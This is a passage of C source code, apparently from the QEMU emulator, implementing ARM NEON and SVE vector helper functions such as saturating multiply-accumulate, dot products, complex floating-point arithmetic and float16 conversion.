0; i < opr_sz / 2; ++i) { d[i] = inl_qrdmlah_s16(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-subtract high half, 16-bit */ static uint16_t inl_qrdmlsh_s16(CPUARMState *env, int16_t src1, int16_t src2, int16_t src3) { /* Similarly, using subtraction: * = ((a3 << 16) - ((e1 * e2) << 1) + (1 << 15)) >> 16 * = ((a3 << 15) - (e1 * e2) + (1 << 14)) >> 15 */ int32_t ret = (int32_t)src1 * src2; ret = ((int32_t)src3 << 15) - ret + (1 << 14); ret >>= 15; if (ret != (int16_t)ret) { SET_QC(); ret = (ret < 0 ? -0x8000 : 0x7fff); } return ret; } uint32_t HELPER(neon_qrdmlsh_s16)(CPUARMState *env, uint32_t src1, uint32_t src2, uint32_t src3) { uint16_t e1 = inl_qrdmlsh_s16(env, src1, src2, src3); uint16_t e2 = inl_qrdmlsh_s16(env, src1 >> 16, src2 >> 16, src3 >> 16); return deposit32(e1, 16, 16, e2); } void HELPER(gvec_qrdmlsh_s16)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int16_t *d = vd; int16_t *n = vn; int16_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 2; ++i) { d[i] = inl_qrdmlsh_s16(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-accumulate high half, 32-bit */ uint32_t HELPER(neon_qrdmlah_s32)(CPUARMState *env, int32_t src1, int32_t src2, int32_t src3) { /* Simplify similarly to int_qrdmlah_s16 above. */ int64_t ret = (int64_t)src1 * src2; ret = ((int64_t)src3 << 31) + ret + (1 << 30); ret >>= 31; if (ret != (int32_t)ret) { SET_QC(); ret = (ret < 0 ? INT32_MIN : INT32_MAX); } return ret; } void HELPER(gvec_qrdmlah_s32)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int32_t *d = vd; int32_t *n = vn; int32_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 4; ++i) { d[i] = helper_neon_qrdmlah_s32(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Signed saturating rounding doubling multiply-subtract high half, 32-bit */ uint32_t HELPER(neon_qrdmlsh_s32)(CPUARMState *env, int32_t src1, int32_t src2, int32_t src3) { /* Simplify similarly to int_qrdmlsh_s16 above. 
*/ int64_t ret = (int64_t)src1 * src2; ret = ((int64_t)src3 << 31) - ret + (1 << 30); ret >>= 31; if (ret != (int32_t)ret) { SET_QC(); ret = (ret < 0 ? INT32_MIN : INT32_MAX); } return ret; } void HELPER(gvec_qrdmlsh_s32)(void *vd, void *vn, void *vm, void *ve, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); int32_t *d = vd; int32_t *n = vn; int32_t *m = vm; CPUARMState *env = ve; uintptr_t i; for (i = 0; i < opr_sz / 4; ++i) { d[i] = helper_neon_qrdmlsh_s32(env, n[i], m[i], d[i]); } clear_tail(d, opr_sz, simd_maxsz(desc)); } /* Integer 8 and 16-bit dot-product. * * Note that for the loops herein, host endianness does not matter * with respect to the ordering of data within the 64-bit lanes. * All elements are treated equally, no matter where they are. */ void HELPER(gvec_sdot_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint32_t *d = vd; int8_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 4; ++i) { d[i] += n[i * 4 + 0] * m[i * 4 + 0] + n[i * 4 + 1] * m[i * 4 + 1] + n[i * 4 + 2] * m[i * 4 + 2] + n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint32_t *d = vd; uint8_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 4; ++i) { d[i] += n[i * 4 + 0] * m[i * 4 + 0] + n[i * 4 + 1] * m[i * 4 + 1] + n[i * 4 + 2] * m[i * 4 + 2] + n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint64_t *d = vd; int16_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { d[i] += (int64_t)n[i * 4 + 0] * m[i * 4 + 0] + (int64_t)n[i * 4 + 1] * m[i * 4 + 1] + (int64_t)n[i * 4 + 2] * m[i * 4 + 2] + (int64_t)n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc); uint64_t *d = vd; uint16_t *n = vn, *m = vm; for (i = 0; i < opr_sz / 8; ++i) { d[i] += (uint64_t)n[i * 4 + 0] * m[i * 4 + 0] + (uint64_t)n[i * 4 + 1] * m[i * 4 + 1] + (uint64_t)n[i * 4 + 2] * m[i * 4 + 2] + (uint64_t)n[i * 4 + 3] * m[i * 4 + 3]; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_idx_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, segend, opr_sz = simd_oprsz(desc), opr_sz_4 = opr_sz / 4; intptr_t index = simd_data(desc); uint32_t *d = vd; int8_t *n = vn; int8_t *m_indexed = (int8_t *)vm + index * 4; /* Notice the special case of opr_sz == 8, from aa64/aa32 advsimd. * Otherwise opr_sz is a multiple of 16. */ segend = MIN(4, opr_sz_4); i = 0; do { int8_t m0 = m_indexed[i * 4 + 0]; int8_t m1 = m_indexed[i * 4 + 1]; int8_t m2 = m_indexed[i * 4 + 2]; int8_t m3 = m_indexed[i * 4 + 3]; do { d[i] += n[i * 4 + 0] * m0 + n[i * 4 + 1] * m1 + n[i * 4 + 2] * m2 + n[i * 4 + 3] * m3; } while (++i < segend); segend = i + 4; } while (i < opr_sz_4); clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_idx_b)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, segend, opr_sz = simd_oprsz(desc), opr_sz_4 = opr_sz / 4; intptr_t index = simd_data(desc); uint32_t *d = vd; uint8_t *n = vn; uint8_t *m_indexed = (uint8_t *)vm + index * 4; /* Notice the special case of opr_sz == 8, from aa64/aa32 advsimd. * Otherwise opr_sz is a multiple of 16. 
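 * Worked example, restating the loop below: with index == 1 each
 * 128-bit segment loads its own bytes m0..m3 once from offset
 * index * 4 within the segment, then every accumulator in the segment
 * computes d[i] += n[4i]*m0 + n[4i+1]*m1 + n[4i+2]*m2 + n[4i+3]*m3.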
*/ segend = MIN(4, opr_sz_4); i = 0; do { uint8_t m0 = m_indexed[i * 4 + 0]; uint8_t m1 = m_indexed[i * 4 + 1]; uint8_t m2 = m_indexed[i * 4 + 2]; uint8_t m3 = m_indexed[i * 4 + 3]; do { d[i] += n[i * 4 + 0] * m0 + n[i * 4 + 1] * m1 + n[i * 4 + 2] * m2 + n[i * 4 + 3] * m3; } while (++i < segend); segend = i + 4; } while (i < opr_sz_4); clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_sdot_idx_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc), opr_sz_8 = opr_sz / 8; intptr_t index = simd_data(desc); uint64_t *d = vd; int16_t *n = vn; int16_t *m_indexed = (int16_t *)vm + index * 4; /* This is supported by SVE only, so opr_sz is always a multiple of 16. * Process the entire segment all at once, writing back the results * only after we've consumed all of the inputs. */ for (i = 0; i < opr_sz_8 ; i += 2) { uint64_t d0, d1; d0 = n[i * 4 + 0] * (int64_t)m_indexed[i * 4 + 0]; d0 += n[i * 4 + 1] * (int64_t)m_indexed[i * 4 + 1]; d0 += n[i * 4 + 2] * (int64_t)m_indexed[i * 4 + 2]; d0 += n[i * 4 + 3] * (int64_t)m_indexed[i * 4 + 3]; d1 = n[i * 4 + 4] * (int64_t)m_indexed[i * 4 + 0]; d1 += n[i * 4 + 5] * (int64_t)m_indexed[i * 4 + 1]; d1 += n[i * 4 + 6] * (int64_t)m_indexed[i * 4 + 2]; d1 += n[i * 4 + 7] * (int64_t)m_indexed[i * 4 + 3]; d[i + 0] += d0; d[i + 1] += d1; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_udot_idx_h)(void *vd, void *vn, void *vm, uint32_t desc) { intptr_t i, opr_sz = simd_oprsz(desc), opr_sz_8 = opr_sz / 8; intptr_t index = simd_data(desc); uint64_t *d = vd; uint16_t *n = vn; uint16_t *m_indexed = (uint16_t *)vm + index * 4; /* This is supported by SVE only, so opr_sz is always a multiple of 16. * Process the entire segment all at once, writing back the results * only after we've consumed all of the inputs. */ for (i = 0; i < opr_sz_8 ; i += 2) { uint64_t d0, d1; d0 = n[i * 4 + 0] * (uint64_t)m_indexed[i * 4 + 0]; d0 += n[i * 4 + 1] * (uint64_t)m_indexed[i * 4 + 1]; d0 += n[i * 4 + 2] * (uint64_t)m_indexed[i * 4 + 2]; d0 += n[i * 4 + 3] * (uint64_t)m_indexed[i * 4 + 3]; d1 = n[i * 4 + 4] * (uint64_t)m_indexed[i * 4 + 0]; d1 += n[i * 4 + 5] * (uint64_t)m_indexed[i * 4 + 1]; d1 += n[i * 4 + 6] * (uint64_t)m_indexed[i * 4 + 2]; d1 += n[i * 4 + 7] * (uint64_t)m_indexed[i * 4 + 3]; d[i + 0] += d0; d[i + 1] += d1; } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcaddh)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; uint32_t neg_real = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < opr_sz / 2; i += 2) { float16 e0 = n[H2(i)]; float16 e1 = m[H2(i + 1)] ^ neg_imag; float16 e2 = n[H2(i + 1)]; float16 e3 = m[H2(i)] ^ neg_real; d[H2(i)] = float16_add(e0, e1, fpst); d[H2(i + 1)] = float16_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcadds)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; uint32_t neg_real = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. 
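   Example: a set bit becomes 0x80000000 here, and x ^ 0x80000000 flips
   only the IEEE sign bit of a float32, so the +/-90-degree rotation
   costs no branch per element.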
*/ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < opr_sz / 4; i += 2) { float32 e0 = n[H4(i)]; float32 e1 = m[H4(i + 1)] ^ neg_imag; float32 e2 = n[H4(i + 1)]; float32 e3 = m[H4(i)] ^ neg_real; d[H4(i)] = float32_add(e0, e1, fpst); d[H4(i + 1)] = float32_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcaddd)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float64 *d = vd; float64 *n = vn; float64 *m = vm; float_status *fpst = vfpst; uint64_t neg_real = extract64(desc, SIMD_DATA_SHIFT, 1); uint64_t neg_imag = neg_real ^ 1; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 63; neg_imag <<= 63; for (i = 0; i < opr_sz / 8; i += 2) { float64 e0 = n[i]; float64 e1 = m[i + 1] ^ neg_imag; float64 e2 = n[i + 1]; float64 e3 = m[i] ^ neg_real; d[i] = float64_add(e0, e1, fpst); d[i + 1] = float64_add(e2, e3, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlah)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint32_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < opr_sz / 2; i += 2) { float16 e2 = n[H2(i + flip)]; float16 e1 = m[H2(i + flip)] ^ neg_real; float16 e4 = e2; float16 e3 = m[H2(i + 1 - flip)] ^ neg_imag; d[H2(i)] = float16_muladd(e2, e1, d[H2(i)], 0, fpst); d[H2(i + 1)] = float16_muladd(e4, e3, d[H2(i + 1)], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlah_idx)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float16 *d = vd; float16 *n = vn; float16 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); intptr_t index = extract32(desc, SIMD_DATA_SHIFT + 2, 2); uint32_t neg_real = flip ^ neg_imag; intptr_t elements = opr_sz / sizeof(float16); intptr_t eltspersegment = 16 / sizeof(float16); intptr_t i, j; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 15; neg_imag <<= 15; for (i = 0; i < elements; i += eltspersegment) { float16 mr = m[H2(i + 2 * index + 0)]; float16 mi = m[H2(i + 2 * index + 1)]; float16 e1 = neg_real ^ (flip ? mi : mr); float16 e3 = neg_imag ^ (flip ? mr : mi); for (j = i; j < i + eltspersegment; j += 2) { float16 e2 = n[H2(j + flip)]; float16 e4 = e2; d[H2(j)] = float16_muladd(e2, e1, d[H2(j)], 0, fpst); d[H2(j + 1)] = float16_muladd(e4, e3, d[H2(j + 1)], 0, fpst); } } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlas)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint32_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. 
*/ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < opr_sz / 4; i += 2) { float32 e2 = n[H4(i + flip)]; float32 e1 = m[H4(i + flip)] ^ neg_real; float32 e4 = e2; float32 e3 = m[H4(i + 1 - flip)] ^ neg_imag; d[H4(i)] = float32_muladd(e2, e1, d[H4(i)], 0, fpst); d[H4(i + 1)] = float32_muladd(e4, e3, d[H4(i + 1)], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlas_idx)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float32 *d = vd; float32 *n = vn; float32 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint32_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); intptr_t index = extract32(desc, SIMD_DATA_SHIFT + 2, 2); uint32_t neg_real = flip ^ neg_imag; intptr_t elements = opr_sz / sizeof(float32); intptr_t eltspersegment = 16 / sizeof(float32); intptr_t i, j; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 31; neg_imag <<= 31; for (i = 0; i < elements; i += eltspersegment) { float32 mr = m[H4(i + 2 * index + 0)]; float32 mi = m[H4(i + 2 * index + 1)]; float32 e1 = neg_real ^ (flip ? mi : mr); float32 e3 = neg_imag ^ (flip ? mr : mi); for (j = i; j < i + eltspersegment; j += 2) { float32 e2 = n[H4(j + flip)]; float32 e4 = e2; d[H4(j)] = float32_muladd(e2, e1, d[H4(j)], 0, fpst); d[H4(j + 1)] = float32_muladd(e4, e3, d[H4(j + 1)], 0, fpst); } } clear_tail(d, opr_sz, simd_maxsz(desc)); } void HELPER(gvec_fcmlad)(void *vd, void *vn, void *vm, void *vfpst, uint32_t desc) { uintptr_t opr_sz = simd_oprsz(desc); float64 *d = vd; float64 *n = vn; float64 *m = vm; float_status *fpst = vfpst; intptr_t flip = extract32(desc, SIMD_DATA_SHIFT, 1); uint64_t neg_imag = extract32(desc, SIMD_DATA_SHIFT + 1, 1); uint64_t neg_real = flip ^ neg_imag; uintptr_t i; /* Shift boolean to the sign bit so we can xor to negate. */ neg_real <<= 63; neg_imag <<= 63; for (i = 0; i < opr_sz / 8; i += 2) { float64 e2 = n[i + flip]; float64 e1 = m[i + flip] ^ neg_real; float64 e4 = e2; float64 e3 = m[i + 1 - flip] ^ neg_imag; d[i] = float64_muladd(e2, e1, d[i], 0, fpst); d[i + 1] = float64_muladd(e4, e3, d[i + 1], 0, fpst); } clear_tail(d, opr_sz, simd_maxsz(desc)); } #define DO_2OP(NAME, FUNC, TYPE) \ void HELPER(NAME)(void *vd, void *vn, void *stat, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPE *d = vd, *n = vn; \ for (i = 0; i < oprsz / sizeof(TYPE); i++) { \ d[i] = FUNC(n[i], stat); \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_2OP(gvec_frecpe_h, helper_recpe_f16, float16) DO_2OP(gvec_frecpe_s, helper_recpe_f32, float32) DO_2OP(gvec_frecpe_d, helper_recpe_f64, float64) DO_2OP(gvec_frsqrte_h, helper_rsqrte_f16, float16) DO_2OP(gvec_frsqrte_s, helper_rsqrte_f32, float32) DO_2OP(gvec_frsqrte_d, helper_rsqrte_f64, float64) #undef DO_2OP /* Floating-point trigonometric starting value. * See the ARM ARM pseudocode function FPTrigSMul. 
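 * In short: the result below is op1 * op1 with its sign forced from
 * bit 0 of op2 (negative when odd), unless the square is a NaN.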
*/ static float16 float16_ftsmul(float16 op1, uint16_t op2, float_status *stat) { float16 result = float16_mul(op1, op1, stat); if (!float16_is_any_nan(result)) { result = float16_set_sign(result, op2 & 1); } return result; } static float32 float32_ftsmul(float32 op1, uint32_t op2, float_status *stat) { float32 result = float32_mul(op1, op1, stat); if (!float32_is_any_nan(result)) { result = float32_set_sign(result, op2 & 1); } return result; } static float64 float64_ftsmul(float64 op1, uint64_t op2, float_status *stat) { float64 result = float64_mul(op1, op1, stat); if (!float64_is_any_nan(result)) { result = float64_set_sign(result, op2 & 1); } return result; } #define DO_3OP(NAME, FUNC, TYPE) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *stat, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPE *d = vd, *n = vn, *m = vm; \ for (i = 0; i < oprsz / sizeof(TYPE); i++) { \ d[i] = FUNC(n[i], m[i], stat); \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_3OP(gvec_fadd_h, float16_add, float16) DO_3OP(gvec_fadd_s, float32_add, float32) DO_3OP(gvec_fadd_d, float64_add, float64) DO_3OP(gvec_fsub_h, float16_sub, float16) DO_3OP(gvec_fsub_s, float32_sub, float32) DO_3OP(gvec_fsub_d, float64_sub, float64) DO_3OP(gvec_fmul_h, float16_mul, float16) DO_3OP(gvec_fmul_s, float32_mul, float32) DO_3OP(gvec_fmul_d, float64_mul, float64) DO_3OP(gvec_ftsmul_h, float16_ftsmul, float16) DO_3OP(gvec_ftsmul_s, float32_ftsmul, float32) DO_3OP(gvec_ftsmul_d, float64_ftsmul, float64) #ifdef TARGET_AARCH64 DO_3OP(gvec_recps_h, helper_recpsf_f16, float16) DO_3OP(gvec_recps_s, helper_recpsf_f32, float32) DO_3OP(gvec_recps_d, helper_recpsf_f64, float64) DO_3OP(gvec_rsqrts_h, helper_rsqrtsf_f16, float16) DO_3OP(gvec_rsqrts_s, helper_rsqrtsf_f32, float32) DO_3OP(gvec_rsqrts_d, helper_rsqrtsf_f64, float64) #endif #undef DO_3OP /* For the indexed ops, SVE applies the index per 128-bit vector segment. * For AdvSIMD, there is of course only one such vector segment. 
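 * Concretely, with float32 a segment is four elements, so a 256-bit SVE
 * vector runs the outer loop twice and each half multiplies by its own
 * m[H(i + idx)], while a 128-bit AdvSIMD vector runs it exactly once.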
*/ #define DO_MUL_IDX(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *stat, uint32_t desc) \ { \ intptr_t i, j, oprsz = simd_oprsz(desc), segment = 16 / sizeof(TYPE); \ intptr_t idx = simd_data(desc); \ TYPE *d = vd, *n = vn, *m = vm; \ for (i = 0; i < oprsz / sizeof(TYPE); i += segment) { \ TYPE mm = m[H(i + idx)]; \ for (j = 0; j < segment; j++) { \ d[i + j] = TYPE##_mul(n[i + j], mm, stat); \ } \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_MUL_IDX(gvec_fmul_idx_h, float16, H2) DO_MUL_IDX(gvec_fmul_idx_s, float32, H4) DO_MUL_IDX(gvec_fmul_idx_d, float64, ) #undef DO_MUL_IDX #define DO_FMLA_IDX(NAME, TYPE, H) \ void HELPER(NAME)(void *vd, void *vn, void *vm, void *va, \ void *stat, uint32_t desc) \ { \ intptr_t i, j, oprsz = simd_oprsz(desc), segment = 16 / sizeof(TYPE); \ TYPE op1_neg = extract32(desc, SIMD_DATA_SHIFT, 1); \ intptr_t idx = desc >> (SIMD_DATA_SHIFT + 1); \ TYPE *d = vd, *n = vn, *m = vm, *a = va; \ op1_neg <<= (8 * sizeof(TYPE) - 1); \ for (i = 0; i < oprsz / sizeof(TYPE); i += segment) { \ TYPE mm = m[H(i + idx)]; \ for (j = 0; j < segment; j++) { \ d[i + j] = TYPE##_muladd(n[i + j] ^ op1_neg, \ mm, a[i + j], 0, stat); \ } \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_FMLA_IDX(gvec_fmla_idx_h, float16, H2) DO_FMLA_IDX(gvec_fmla_idx_s, float32, H4) DO_FMLA_IDX(gvec_fmla_idx_d, float64, ) #undef DO_FMLA_IDX #define DO_SAT(NAME, WTYPE, TYPEN, TYPEM, OP, MIN, MAX) \ void HELPER(NAME)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) \ { \ intptr_t i, oprsz = simd_oprsz(desc); \ TYPEN *d = vd, *n = vn; TYPEM *m = vm; \ bool q = false; \ for (i = 0; i < oprsz / sizeof(TYPEN); i++) { \ WTYPE dd = (WTYPE)n[i] OP m[i]; \ if (dd < MIN) { \ dd = MIN; \ q = true; \ } else if (dd > MAX) { \ dd = MAX; \ q = true; \ } \ d[i] = dd; \ } \ if (q) { \ uint32_t *qc = vq; \ qc[0] = 1; \ } \ clear_tail(d, oprsz, simd_maxsz(desc)); \ } DO_SAT(gvec_uqadd_b, int, uint8_t, uint8_t, +, 0, UINT8_MAX) DO_SAT(gvec_uqadd_h, int, uint16_t, uint16_t, +, 0, UINT16_MAX) DO_SAT(gvec_uqadd_s, int64_t, uint32_t, uint32_t, +, 0, UINT32_MAX) DO_SAT(gvec_sqadd_b, int, int8_t, int8_t, +, INT8_MIN, INT8_MAX) DO_SAT(gvec_sqadd_h, int, int16_t, int16_t, +, INT16_MIN, INT16_MAX) DO_SAT(gvec_sqadd_s, int64_t, int32_t, int32_t, +, INT32_MIN, INT32_MAX) DO_SAT(gvec_uqsub_b, int, uint8_t, uint8_t, -, 0, UINT8_MAX) DO_SAT(gvec_uqsub_h, int, uint16_t, uint16_t, -, 0, UINT16_MAX) DO_SAT(gvec_uqsub_s, int64_t, uint32_t, uint32_t, -, 0, UINT32_MAX) DO_SAT(gvec_sqsub_b, int, int8_t, int8_t, -, INT8_MIN, INT8_MAX) DO_SAT(gvec_sqsub_h, int, int16_t, int16_t, -, INT16_MIN, INT16_MAX) DO_SAT(gvec_sqsub_s, int64_t, int32_t, int32_t, -, INT32_MIN, INT32_MAX) #undef DO_SAT void HELPER(gvec_uqadd_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { uint64_t nn = n[i], mm = m[i], dd = nn + mm; if (dd < nn) { dd = UINT64_MAX; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_uqsub_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); uint64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { uint64_t nn = n[i], mm = m[i], dd = nn - mm; if (nn < mm) { dd = 0; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_sqadd_d)(void *vd, void *vq, void *vn, 
void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); int64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { int64_t nn = n[i], mm = m[i], dd = nn + mm; if (((dd ^ nn) & ~(nn ^ mm)) & INT64_MIN) { dd = (nn >> 63) ^ ~INT64_MIN; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_sqsub_d)(void *vd, void *vq, void *vn, void *vm, uint32_t desc) { intptr_t i, oprsz = simd_oprsz(desc); int64_t *d = vd, *n = vn, *m = vm; bool q = false; for (i = 0; i < oprsz / 8; i++) { int64_t nn = n[i], mm = m[i], dd = nn - mm; if (((dd ^ nn) & (nn ^ mm)) & INT64_MIN) { dd = (nn >> 63) ^ ~INT64_MIN; q = true; } d[i] = dd; } if (q) { uint32_t *qc = vq; qc[0] = 1; } clear_tail(d, oprsz, simd_maxsz(desc)); } /* * Convert float16 to float32, raising no exceptions and * preserving exceptional values, including SNaN. * This is effectively an unpack+repack operation. */ static float32 float16_to_float32_by_bits(uint32_t f16, bool fz16) { const int f16_bias = 15; const int f32_bias = 127; uint32_t sign = extract32(f16, 15, 1); uint32_t exp = extract32(f16, 10, 5); uint32_t frac = extract32(f16, 0, 10); if (exp == 0x1f) { /* Inf or NaN */ exp = 0xff; } else if (exp == 0) { /* Zero or denormal. */ if (frac != 0) { if (fz16) { frac = 0; } else { /* * Denormal; these are all normal float32. * Shift the fraction so that the msb is at bit 11, * then remove bit 11 as the implicit bit of the * normalized float32. Note that we still go through * the shift for normal numbers below, to put the * float32 fraction at the right place. */ int shift = clz32(frac) - 21; frac = (frac << shift) & 0x3ff; exp = f32_bias - f16_bias - shift + 1; } } } else { /* Normal number; adjust the bias. */ exp += f32_bias - f16_bias; } sign <<= 31; exp <<= 23; frac <<= 23 - 10; return sign | exp | frac; } static uint64_t load4_f16(uint64_t *ptr, int is_q, int is_2) { /* * Branchless load of u32[0], u64[0], u32[1], or u64[1]. * Load the 2nd qword iff is_q & is_2. * Shift to the 2nd dword iff !is_q & is_2. * For !is_q & !is_2, the upper bits of the result are garbage. */ return ptr[is_q & is_2] >> ((is_2 & ~is_q) << 5); } /* * Note that FMLAL requires oprsz == 8 or oprsz == 16, * as there is not yet SVE versions that might use blocking. */ static void do_fmlal(float32 *d, void *vn, void *vm, float_status *fpst, uint32_t desc, bool fz16) { intptr_t i, oprsz = simd_oprsz(desc); int is_s = extract32(desc, SIMD_DATA_SHIFT, 1); int is_2 = extract32(desc, SIMD_DATA_SHIFT + 1, 1); int is_q = oprsz == 16; uint64_t n_4, m_4; /* Pre-load all of the f16 data, avoiding overlap issues. */ n_4 = load4_f16(vn, is_q, is_2); m_4 = load4_f16(vm, is_q, is_2); /* Negate all inputs for FMLSL at once. 
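   XORing 0x8000 into every float16 lane flips all four sign bits in a
   single operation, turning FMLSL into FMLAL with a negated first
   operand.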
*/ if (is_s) { n_4 ^= 0x8000800080008000ull; } for (i = 0; i < oprsz / 4; i++) { float32 n_1 = float16_to_float32_by_bits(n_4 >> (i * 16), fz16); float32 m_1 = float16_to_float32_by_bits(m_4 >> (i * 16), fz16); d[H4(i)] = float32_muladd(n_1, m_1, d[H4(i)], 0, fpst); } clear_tail(d, oprsz, simd_maxsz(desc)); } void HELPER(gvec_fmlal_a32)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal(vd, vn, vm, &env->vfp.standard_fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } void HELPER(gvec_fmlal_a64)(void *vd, void *vn, void *vm, void *venv, uint32_t desc) { CPUARMState *env = venv; do_fmlal(vd, vn, vm, &env->vfp.fp_status, desc, get_flush_inputs_to_zero(&env->vfp.fp_status_f16)); } static void do_fmlal_idx(float32 *d, void *vn, void *vm, float_status *fpst, uint32_t desc, bool fz16) { intptr_t i, oprsz = simd_oprsz(desc); int is_s = extract32(desc, SIMD_DATA_SHIFT, 1); int is_2 = extract32(desc, SIMD_DATA_SHIFT + 1, 1); int index = 